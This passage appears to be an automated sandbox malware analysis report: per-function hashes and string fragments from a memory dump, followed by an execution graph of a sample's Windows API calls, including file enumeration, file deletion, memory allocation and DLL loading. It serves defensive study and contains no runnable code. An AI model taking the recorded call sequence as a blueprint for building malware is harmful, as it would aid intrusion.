                                                                                                • Instruction Fuzzy Hash: DD21A5B5D00318AAEF50DFD4DC45BEEBBB9BF04704F00819DE618BA180DBB516488BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B11D50 Relevance: 13.8, Strings: 11, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                • API String ID: 0-685823316
                                                                                                • Opcode ID: 1ac404fe8823fdce08f363d7c76d9063781eecc8359196901d5cdbd591be376b
                                                                                                • Instruction ID: 66baf93409abdc365c2a302814e1fe675fb0dce22c5423802a46b66313c1b033
                                                                                                • Opcode Fuzzy Hash: 1ac404fe8823fdce08f363d7c76d9063781eecc8359196901d5cdbd591be376b
                                                                                                • Instruction Fuzzy Hash: 8B3184B5D01318AAEF50DFE4CC85BEEBBB9AF04704F00419DE6187A180DBB516488BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B226D9 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                • API String ID: 0-2304485323
                                                                                                • Opcode ID: 4706a4e0cd58946d8296ec8be5c346f314330ee4e243123e45703b52bed7a304
                                                                                                • Instruction ID: 24b6edb760e977c1311c000398605ed1f5142080fdd476c08d294665a0a8505a
                                                                                                • Opcode Fuzzy Hash: 4706a4e0cd58946d8296ec8be5c346f314330ee4e243123e45703b52bed7a304
                                                                                                • Instruction Fuzzy Hash: 8CD1CAB5A00714AFDB54DFA4CC41FEEB7B8EF58304F04466DE619EB244E7B8A9058B60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B226D4 Relevance: 12.7, Strings: 10, Instructions: 212COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                • API String ID: 0-2304485323
                                                                                                • Opcode ID: fb4004fb420a520b5284e8b28b451cb127856f3b10fa731f3fa9287fedbb8791
                                                                                                • Instruction ID: 68135d4422361e46b50b609be278812bcefacfab9245a2f06672ff62f112f7af
                                                                                                • Opcode Fuzzy Hash: fb4004fb420a520b5284e8b28b451cb127856f3b10fa731f3fa9287fedbb8791
                                                                                                • Instruction Fuzzy Hash: 8581D8B5900314AFDB54DFE4C841BEEBBB8EF58304F04466DE219EB244E7B8A505CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B0A549 Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$@$K$P$Q$R$^$`$k
                                                                                                • API String ID: 0-1256880444
                                                                                                • Opcode ID: 64a79705ac1374a409c870520fdee7ee2cece196fa07d80f927b9cbb08c543ee
                                                                                                • Instruction ID: ee986e91865ae5a4412fe30fe81cce0cb81213d974f187dfcea7ea23b3ac28a3
                                                                                                • Opcode Fuzzy Hash: 64a79705ac1374a409c870520fdee7ee2cece196fa07d80f927b9cbb08c543ee
                                                                                                • Instruction Fuzzy Hash: EE11E220D187CE9DDB12C7BC84443AEBF715F23224F4882D9D5E56B2D2C2794706D7A6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B25619 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: L$S$\$a$c$e$l
                                                                                                • API String ID: 0-3322591375
                                                                                                • Opcode ID: 96642e6fc8b2726f9e86c6cfe40cd95920f63edddf33bd281c8ee560d8d04569
                                                                                                • Instruction ID: 0a3539c61126d57342d645ca668bbbf0b565bd66a3b1341943fb36fa6b94edc5
                                                                                                • Opcode Fuzzy Hash: 96642e6fc8b2726f9e86c6cfe40cd95920f63edddf33bd281c8ee560d8d04569
                                                                                                • Instruction Fuzzy Hash: 9C41A7B6C10328AACB20DFA4DC84ADEFBB8EF49714F0547AED81DA7110E77155458BD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B25616 Relevance: 8.8, Strings: 7, Instructions: 90COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: L$S$\$a$c$e$l
                                                                                                • API String ID: 0-3322591375
                                                                                                • Opcode ID: 8dfb9a14d492feb152c48e368dac6d7a619d48e2810c4a9a569fc844a5845585
                                                                                                • Instruction ID: 4d7b84c471aca90b76394fbf812fea3cbdf8e0379ed9c99a62c12d4d847c5ff2
                                                                                                • Opcode Fuzzy Hash: 8dfb9a14d492feb152c48e368dac6d7a619d48e2810c4a9a569fc844a5845585
                                                                                                • Instruction Fuzzy Hash: DD3190B6C10328AACB20DFA4CC84BDEFBB5FF49704F1542AED51DA7110E77159858B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1D9DA Relevance: 8.8, Strings: 7, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #9*.$F$P$T$f$r$x
                                                                                                • API String ID: 0-3632725679
                                                                                                • Opcode ID: a512e09f974bfdcbb287fb8e26162e825738452f9ce5aee110484008b45440c9
                                                                                                • Instruction ID: 4914c12d81eff10463b914647b2e6eaaa2e4fe0989246cf9f89ac1abdc63960f
                                                                                                • Opcode Fuzzy Hash: a512e09f974bfdcbb287fb8e26162e825738452f9ce5aee110484008b45440c9
                                                                                                • Instruction Fuzzy Hash: 2101A7B0D10218ABCB20DFE598046EEBFB9FF45718F41825E98157B640E7B64A09CBD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1D9E9 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: F$P$T$f$r$x
                                                                                                • API String ID: 0-2523166886
                                                                                                • Opcode ID: 9fab2c4a289b33fabf9f171991dd47e4cc7b235fd25b3cf712449add3267cd2e
                                                                                                • Instruction ID: 9e16e77905b40a7c05ea5983a08a1958ebfede2ffea9a4b7fef2a09b9193aff6
                                                                                                • Opcode Fuzzy Hash: 9fab2c4a289b33fabf9f171991dd47e4cc7b235fd25b3cf712449add3267cd2e
                                                                                                • Instruction Fuzzy Hash: 2451E775900314AAD734EFA5CC44BABF7F8EF04708F444BAEA54D6A180D7F8A554CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1D139 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $i$l$o$u
                                                                                                • API String ID: 0-2051669658
                                                                                                • Opcode ID: c737d2035d5577605cdec65286511ecf3106bb40553faba7997f7c31f22ee57b
                                                                                                • Instruction ID: c60ffcec69169f62865ef2080a1fb96492c448fb1bad9abc43b4a3f26c3b93a6
                                                                                                • Opcode Fuzzy Hash: c737d2035d5577605cdec65286511ecf3106bb40553faba7997f7c31f22ee57b
                                                                                                • Instruction Fuzzy Hash: CA615EB5A00304AFDB24DBA4DC84FEFB7FDEB88704F1445ADE559A7240E734AA518B60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1D135 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $i$l$o$u
                                                                                                • API String ID: 0-2051669658
                                                                                                • Opcode ID: bd88f13c8e4cb340d68b31156b302dcc7f2b718cf08fbc841c057b0b4c9e0ffd
                                                                                                • Instruction ID: 406bc233a891a8456f5de9f8388673a17f4a8f9ae9ee14367a25a686d7386cb0
                                                                                                • Opcode Fuzzy Hash: bd88f13c8e4cb340d68b31156b302dcc7f2b718cf08fbc841c057b0b4c9e0ffd
                                                                                                • Instruction Fuzzy Hash: 43412CB5E00318AFDB24DFA5D884FEEBBF9EB48704F1045ADE559A7240D770AA418B60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B19249 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$1$2$7$F
                                                                                                • API String ID: 0-2632938639
                                                                                                • Opcode ID: d128f171659f909b0ff06464b4542bff84fb94d8e77f8e20a296342682d58836
                                                                                                • Instruction ID: bf7ddf370ef6ced7efad457cc97fd53a7e9e9edad71cc99db92b8b6ac1704a4a
                                                                                                • Opcode Fuzzy Hash: d128f171659f909b0ff06464b4542bff84fb94d8e77f8e20a296342682d58836
                                                                                                • Instruction Fuzzy Hash: 743166B5D10219BBDB04DBA4DD41FFEB7B8EF44308F404199E908AB240E7B5AB058BE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1CDD9 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $e$k$o
                                                                                                • API String ID: 0-3624523832
                                                                                                • Opcode ID: 9295d7c21b64873d9a01210fe2cd49d9d044752d4002aeddb7e9641632a849d6
                                                                                                • Instruction ID: 4f769c1c964cfb95582e63643c52cb9e928d6a09027b487d1fe3e8d94758f3ca
                                                                                                • Opcode Fuzzy Hash: 9295d7c21b64873d9a01210fe2cd49d9d044752d4002aeddb7e9641632a849d6
                                                                                                • Instruction Fuzzy Hash: 58B13CB5A00708AFDB24DBA4CC84FEFB7FDAF88704F148598F619A7244D674AA51CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1D6D9 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $e$h$o
                                                                                                • API String ID: 0-3662636641
                                                                                                • Opcode ID: 3d1442660b2ce80eb3487b77c8909202398cbf57d4da629e36093bdf78ff8f11
                                                                                                • Instruction ID: 5223368343679713f300bbcde599f0edc89bc1b599e8e4707b3b850b3b2d989b
                                                                                                • Opcode Fuzzy Hash: 3d1442660b2ce80eb3487b77c8909202398cbf57d4da629e36093bdf78ff8f11
                                                                                                • Instruction Fuzzy Hash: 63716576E003287EDB54DB94CC85FEE737CAF89204F4042EDB55DA6050EE746B848BA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1CDCB Relevance: 5.2, Strings: 4, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $e$k$o
                                                                                                • API String ID: 0-3624523832
                                                                                                • Opcode ID: 6dd6a4c901fd20ae4164b8198d7748bf88e43c283725122deaf8155ce1690fb3
                                                                                                • Instruction ID: bd58511eb581ef4a353030e0a0419db49459985cd746ed960edbbdf634e4be92
                                                                                                • Opcode Fuzzy Hash: 6dd6a4c901fd20ae4164b8198d7748bf88e43c283725122deaf8155ce1690fb3
                                                                                                • Instruction Fuzzy Hash: B6612C75A00708AFDB64DFA4CC84FEFBBBDAF88704F148569E6199B244D730AA41CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1CC8B Relevance: 5.1, Strings: 4, Instructions: 125COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                • API String ID: 0-2877786613
                                                                                                • Opcode ID: 8d8c00838a4b53c1dd723c03b2fa06809e8ae42e946f5109c6a78dfe5b96d427
                                                                                                • Instruction ID: 05f20abd78c1978f0127df0c94f6935c69b02411dc5d50e8afd58336ed0ddb20
                                                                                                • Opcode Fuzzy Hash: 8d8c00838a4b53c1dd723c03b2fa06809e8ae42e946f5109c6a78dfe5b96d427
                                                                                                • Instruction Fuzzy Hash: 503182B99112247EE701EB94CC41FEF7B3C9F49708F144199FA186E180D7B46A418BF6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1CC99 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                • API String ID: 0-2877786613
                                                                                                • Opcode ID: d01a8ef6eefa25690d17bcb1cd20795119a667700bf070aaa34cd2397b4539e9
                                                                                                • Instruction ID: 92726f2978ffcfda5e67d5ddb77a2d10c9e1c052ebdc4e4500eebf979f57a4fe
                                                                                                • Opcode Fuzzy Hash: d01a8ef6eefa25690d17bcb1cd20795119a667700bf070aaa34cd2397b4539e9
                                                                                                • Instruction Fuzzy Hash: 3A3142B5911224BEE701EB94CC41FEF7B3C9F89708F104199F6186E180D7B46A458BF6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1D6D6 Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $e$h$o
                                                                                                • API String ID: 0-3662636641
                                                                                                • Opcode ID: c44dd0cef09af8b16febf33bac3e078371e512262fdbacb7450aaa822c17c8fa
                                                                                                • Instruction ID: 94f1c98d05cd1d881257ef6e2e6524c87c7453fd678b7bcf61bc1bcf55203ff0
                                                                                                • Opcode Fuzzy Hash: c44dd0cef09af8b16febf33bac3e078371e512262fdbacb7450aaa822c17c8fa
                                                                                                • Instruction Fuzzy Hash: EC315171D00328BEDF50DB64CC41FEE77B8AF45304F4046E9A55DAA150EA745B848F92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:2.6%
                                                                                                Dynamic/Decrypted Code Coverage:4.2%
                                                                                                Signature Coverage:2.2%
                                                                                                Total number of Nodes:454
                                                                                                Total number of Limit Nodes:73
                                                                                                execution_graph 94532 27a2b7c 94537 27a72b0 94532->94537 94535 27a2ba1 94538 27a72ca 94537->94538 94542 27a2b8c 94537->94542 94546 27b7260 94538->94546 94541 27b7b50 NtClose 94541->94542 94542->94535 94543 27b7b50 94542->94543 94544 27b7b6d 94543->94544 94545 27b7b7e NtClose 94544->94545 94545->94535 94547 27b727d 94546->94547 94550 48e35c0 LdrInitializeThunk 94547->94550 94548 27a739a 94548->94541 94550->94548 94551 27993b0 94552 279960e 94551->94552 94553 2799af3 94552->94553 94555 27b96c0 94552->94555 94556 27b96e6 94555->94556 94561 2793d80 94556->94561 94558 27b9705 94559 27b9733 94558->94559 94564 27b4160 94558->94564 94559->94553 94568 27a2c80 94561->94568 94563 2793d8d 94563->94558 94565 27b41ba 94564->94565 94567 27b41c7 94565->94567 94592 27a1110 94565->94592 94567->94559 94569 27a2c97 94568->94569 94571 27a2cb0 94569->94571 94572 27b8580 94569->94572 94571->94563 94574 27b8598 94572->94574 94573 27b85bc 94573->94571 94574->94573 94579 27b71c0 94574->94579 94580 27b71dd 94579->94580 94586 48e2c0a 94580->94586 94581 27b7209 94583 27b9a50 94581->94583 94589 27b7eb0 94583->94589 94585 27b862a 94585->94571 94587 48e2c1f LdrInitializeThunk 94586->94587 94588 48e2c11 94586->94588 94587->94581 94588->94581 94590 27b7eca 94589->94590 94591 27b7edb RtlFreeHeap 94590->94591 94591->94585 94593 27a114b 94592->94593 94608 27a73c0 94593->94608 94595 27a1153 94606 27a1422 94595->94606 94619 27b9b30 94595->94619 94597 27a1169 94598 27b9b30 RtlAllocateHeap 94597->94598 94599 27a117a 94598->94599 94600 27b9b30 RtlAllocateHeap 94599->94600 94601 27a118b 94600->94601 94607 27a121e 94601->94607 94631 27a61d0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 94601->94631 94604 27a13df 94627 27b6880 94604->94627 94606->94567 94622 27a3f50 94607->94622 94609 27a73ec 94608->94609 94610 27a72b0 2 API calls 94609->94610 94611 27a740f 94610->94611 94612 27a7419 94611->94612 94613 27a7431 94611->94613 94614 27a7424 94612->94614 94616 27b7b50 NtClose 94612->94616 94615 27a744d 94613->94615 94617 27b7b50 NtClose 94613->94617 94614->94595 94615->94595 94616->94614 94618 27a7443 94617->94618 94618->94595 94632 27b7e60 94619->94632 94621 27b9b4b 94621->94597 94624 27a3f74 94622->94624 94623 27a3f7b 94623->94604 94624->94623 94625 27a3fb0 LdrLoadDll 94624->94625 94626 27a3fc7 94624->94626 94625->94626 94626->94604 94628 27b68da 94627->94628 94630 27b68e7 94628->94630 94635 27a1440 94628->94635 94630->94606 94631->94607 94633 27b7e7d 94632->94633 94634 27b7e8e RtlAllocateHeap 94633->94634 94634->94621 94653 27a7690 94635->94653 94637 27a1945 94637->94630 94638 27a1460 94638->94637 94657 27b0300 94638->94657 94641 27a1645 94664 27bab30 94641->94664 94643 27a1661 94669 27bac60 94643->94669 94645 27a14be 94645->94637 94660 27b67f0 94645->94660 94647 27a1676 94649 27a16a1 94647->94649 94675 27a00d0 94647->94675 94649->94637 94650 27a00d0 LdrInitializeThunk 94649->94650 94678 27a7630 94649->94678 94650->94649 94651 27a17cf 94651->94649 94652 27a7630 LdrInitializeThunk 94651->94652 94652->94651 94654 27a769d 94653->94654 94655 27a76be SetErrorMode 94654->94655 94656 27a76c5 94654->94656 94655->94656 94656->94638 94682 27b99c0 94657->94682 94659 27b0321 94659->94645 94661 27b684a 94660->94661 94663 27b685f 94661->94663 94689 27a1960 94661->94689 94663->94641 94665 27bab40 94664->94665 94666 27bab46 94664->94666 94665->94643 94667 27b9b30 RtlAllocateHeap 94666->94667 94668 27bab6c 94667->94668 94668->94643 94670 27babd0 94669->94670 94671 27bac2d 94670->94671 94672 27b9b30 RtlAllocateHeap 94670->94672 94671->94647 94673 27bac0a 94672->94673 94674 27b9a50 RtlFreeHeap 94673->94674 94674->94671 94695 27b7dc0 94675->94695 94679 27a7643 94678->94679 94700 27b70d0 94679->94700 94681 27a766e 94681->94649 94685 27b7ca0 94682->94685 94684 27b99f1 94684->94659 94686 27b7d2a 94685->94686 94687 27b7cc4 94685->94687 94688 27b7d40 NtAllocateVirtualMemory 94686->94688 94687->94684 94688->94684 94690 27a1969 94689->94690 94693 27a1852 94689->94693 94691 27a00d0 LdrInitializeThunk 94691->94693 94692 27a7630 LdrInitializeThunk 94692->94693 94693->94691 94693->94692 94694 27a1945 94693->94694 94694->94663 94696 27b7dda 94695->94696 94699 48e2c70 LdrInitializeThunk 94696->94699 94697 27a00f2 94697->94651 94699->94697 94701 27b70f4 94700->94701 94702 27b7143 94700->94702 94701->94681 94705 48e2dd0 LdrInitializeThunk 94702->94705 94703 27b7168 94703->94681 94705->94703 94706 27a68f0 94707 27a695f 94706->94707 94708 27a690c 94706->94708 94715 27a6a88 94707->94715 94717 27a5d00 NtClose LdrInitializeThunk LdrInitializeThunk 94707->94717 94708->94707 94709 27b7b50 NtClose 94708->94709 94710 27a6927 94709->94710 94716 27a5d00 NtClose LdrInitializeThunk LdrInitializeThunk 94710->94716 94712 27a6a62 94712->94715 94718 27a5ed0 NtClose LdrInitializeThunk LdrInitializeThunk 94712->94718 94716->94707 94717->94712 94718->94715 94719 27ab970 94721 27ab999 94719->94721 94720 27aba9d 94721->94720 94722 27aba43 FindFirstFileW 94721->94722 94722->94720 94724 27aba5e 94722->94724 94723 27aba84 FindNextFileW 94723->94724 94725 27aba96 FindClose 94723->94725 94724->94723 94725->94720 94726 27b7ab0 94727 27b7b1f 94726->94727 94728 27b7ad7 94726->94728 94729 27b7b35 NtDeleteFile 94727->94729 94735 27b7170 94736 27b718a 94735->94736 94739 48e2df0 LdrInitializeThunk 94736->94739 94737 27b71b2 94739->94737 94740 27a90eb 94742 27a90fa 94740->94742 94741 27a9101 94742->94741 94743 27b9a50 RtlFreeHeap 94742->94743 94743->94741 94744 27aea60 94745 27aeac4 94744->94745 94773 27a5a70 94745->94773 94747 27aebf4 94748 27aebed 94748->94747 94780 27a5b80 94748->94780 94750 27aed93 94751 27aec70 94751->94750 94752 27aeda2 94751->94752 94784 27ae840 94751->94784 94754 27b7b50 NtClose 94752->94754 94755 27aedac 94754->94755 94756 27aeca5 94756->94752 94757 27aecb0 94756->94757 94758 27b9b30 RtlAllocateHeap 94757->94758 94759 27aecd9 94758->94759 94760 27aecf8 94759->94760 94761 27aece2 94759->94761 94793 27ae730 CoInitialize 94760->94793 94762 27b7b50 NtClose 94761->94762 94764 27aecec 94762->94764 94765 27aed06 94795 27b7620 94765->94795 94767 27aed82 94768 27b7b50 NtClose 94767->94768 94769 27aed8c 94768->94769 94770 27b9a50 RtlFreeHeap 94769->94770 94770->94750 94771 27aed24 94771->94767 94772 27b7620 LdrInitializeThunk 94771->94772 94772->94771 94774 27a5aa3 94773->94774 94775 27a5ac7 94774->94775 94799 27b76d0 94774->94799 94775->94748 94777 27a5aea 94777->94775 94778 27b7b50 NtClose 94777->94778 94779 27a5b6c 94778->94779 94779->94748 94781 27a5ba5 94780->94781 94804 27b74c0 94781->94804 94785 27ae85c 94784->94785 94786 27a3f50 LdrLoadDll 94785->94786 94788 27ae87a 94786->94788 94787 27ae883 94787->94756 94788->94787 94789 27a3f50 LdrLoadDll 94788->94789 94790 27ae94e 94789->94790 94791 27a3f50 LdrLoadDll 94790->94791 94792 27ae9ab 94790->94792 94791->94792 94792->94756 94794 27ae795 94793->94794 94794->94765 94796 27b763d 94795->94796 94809 48e2ba0 LdrInitializeThunk 94796->94809 94797 27b766d 94797->94771 94800 27b76ea 94799->94800 94803 48e2ca0 LdrInitializeThunk 94800->94803 94801 27b7716 94801->94777 94803->94801 94805 27b74da 94804->94805 94808 48e2c60 LdrInitializeThunk 94805->94808 94806 27a5c19 94806->94751 94808->94806 94809->94797 94810 27a6520 94811 27a654a 94810->94811 94814 27a7460 94811->94814 94813 27a6574 94815 27a747d 94814->94815 94821 27b72b0 94815->94821 94817 27a74cd 94818 27a74d4 94817->94818 94826 27b7390 94817->94826 94818->94813 94820 27a74fd 94820->94813 94822 27b7343 94821->94822 94823 27b72d7 94821->94823 94831 48e2f30 LdrInitializeThunk 94822->94831 94823->94817 94824 27b737c 94824->94817 94827 27b7432 94826->94827 94828 27b73b4 94826->94828 94832 48e2d10 LdrInitializeThunk 94827->94832 94828->94820 94829 27b7477 94829->94820 94831->94824 94832->94829 94833 27b7860 94834 27b790f 94833->94834 94836 27b788b 94833->94836 94835 27b7925 NtCreateFile 94834->94835 94837 27a7ce1 94838 27a7cd2 94837->94838 94839 27a7ce6 94837->94839 94839->94838 94841 27a6740 LdrInitializeThunk LdrInitializeThunk 94839->94841 94841->94838 94847 27b4320 94848 27b437a 94847->94848 94849 27b4387 94848->94849 94851 27a6b40 94848->94851 94852 27a6b12 94851->94852 94854 27a6b32 94852->94854 94855 27aa6d0 94852->94855 94854->94849 94856 27aa6f6 94855->94856 94857 27aa915 94856->94857 94882 27b7f40 94856->94882 94857->94854 94859 27aa76c 94859->94857 94860 27bac60 2 API calls 94859->94860 94861 27aa788 94860->94861 94861->94857 94862 27aa859 94861->94862 94863 27b71c0 LdrInitializeThunk 94861->94863 94864 27a5180 LdrInitializeThunk 94862->94864 94869 27aa878 94862->94869 94865 27aa7e4 94863->94865 94864->94869 94865->94862 94867 27aa7ed 94865->94867 94866 27a7630 LdrInitializeThunk 94872 27aa84f 94866->94872 94867->94857 94876 27aa841 94867->94876 94878 27aa81f 94867->94878 94885 27a5180 94867->94885 94868 27aa8fd 94873 27a7630 